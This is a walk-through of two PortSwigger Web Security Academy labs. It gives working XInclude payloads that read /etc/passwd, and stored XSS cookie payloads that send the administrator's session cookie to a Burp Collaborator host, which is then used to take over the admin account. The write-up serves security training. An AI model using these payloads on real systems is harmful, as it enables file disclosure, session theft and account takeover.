Walk-through of the Essential skills lab on PortSwigger Web Security Academy.
- Practitioner – Discovering vulnerabilities quickly with targeted scanning
- Practitioner – Scanning non-standard data structures
Practitioner – Discovering vulnerabilities quickly with targeted scanning
This lab contains a vulnerability that enables you to read arbitrary files from the server. To solve the lab, retrieve the contents of /etc/passwd within 10 minutes.
Due to the tight time limit, we recommend using Burp Scanner to help you. You can obviously scan the entire site to identify the vulnerability, but this might not leave you enough time to solve the lab. Instead, use your intuition to identify endpoints that are likely to be vulnerable, then try running a targeted scan on a specific request. Once Burp Scanner has identified an attack vector, you can use your own expertise to find a way to exploit it.
- On the Home page, click on View details for a product.
- Click on Check stock.
- Send the request to the Repeater module.
- Highlight the productId paramater value (e.g. “1”), right-click and select Scan selected insertion points.
- In the Dashboard tab, click on View details for the audit task.
- Some issues are found, including an XML injection.
- Right-click on the request and send it to the Repeater module
POST /product/stock HTTP/1.1
...
productId=%3cokm%20xmlns%3axi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a%2f%2f<BURP COLLABORATOR ID>.oastify.com%2ffoo%22%2f%3e%3c%2fokm%3e&storeId=1
se the Hackvertor extension.
productId=<@urlencode><lal xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="https://oumg4w9ukj3wwv3lco02ewnx8oeg26qv.oastify.com"/></lal><@/urlencode>&storeId=1
Burp Collaborator receives a request. This looks like a XInclude attack (xi:include), see Exploiting XXE to retrieve files (PortSwigger). See lab Practitioner – Exploiting XInclude to retrieve files.
POST /product/stock HTTP/1.1
...
productId=<@urlencode><lal xmlns:xi="http://www.w3.org/2001/XInclude"><foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo></lal><@/urlencode>&storeId=1
Practitioner – Scanning non-standard data structures
This lab contains a vulnerability that is difficult to find manually. It is located in a non-standard data structure. To solve the lab, use Burp Scanner’s Scan selected insertion point feature to identify the vulnerability, then manually exploit it and delete carlos. You can log in to your own account with the following credentials: wiener:peter
Click on My account and log in with credentials wiener:peter.
The session cookie has a format of “username:sessionid”.
GET /my-account?id=wiener HTTP/2
Host: <LAB ID>.web-security-academy.net
Cookie: session=wiener%3a<SESSION ID>
[...]
Highlight the username wiener, right-click Scan selected insertion point->Add to task: Active scans. Go to the Dashboard and display all issues. The scanner will find the vulnerability Cross-site scripting (stored) on /my-account.
GET /my-account?id=wiener HTTP/2
Host: <LAB ID>.web-security-academy.net
Cookie: session='"><svg/onload=fetch`//<BURP COLLABORATOR ID>\.oastify.com`>:<SESSION ID>
[...]
Exfiltrate the administrator’s cookies. Note that the fetch function needs the parentheses to exfiltrate the cookies and that the “+” signs is URL encoded. These 2 payloads work:
'"><svg/onload=fetch(`//<BURP COLLABORATOR ID>\.oastify.com?c=`%2bdocument.cookie)>
'"><svg/onload=import(`//<BURP COLLABORATOR ID>\.oastify.com?c=`%2bdocument.cookie)>
Send the payload using the Repeater module.
GET /my-account?id=wiener HTTP/2
Host: <LAB ID>.web-security-academy.net
Cookie: session='"><svg/onload=import(`//<BURP COLLABORATOR ID>\.oastify.com?c=`%2bdocument.cookie)>:<SESSION ID>
[...]
The Burp Collaborator will receive a requests with the administrator’s cookies.
GET /?c=session=administrator%3ag7APsdyA1ceMSXtKd5Mp143nZuvjN3uG;%20secret=DpJUnZzDABqNrgk2RNrxwXEpcSTEqGfe;%20session=administrator%3ag7APsdyA1ceMSXtKd5Mp143nZuvjN3uG HTTP/1.1
[...]
In your web browser, change the session cookie value and refresh the page.
administrator%3ag7APsdyA1ceMSXtKd5Mp143nZuvjN3uG
You will now see the Admin panel menu. Delete user carlos to solve the lab.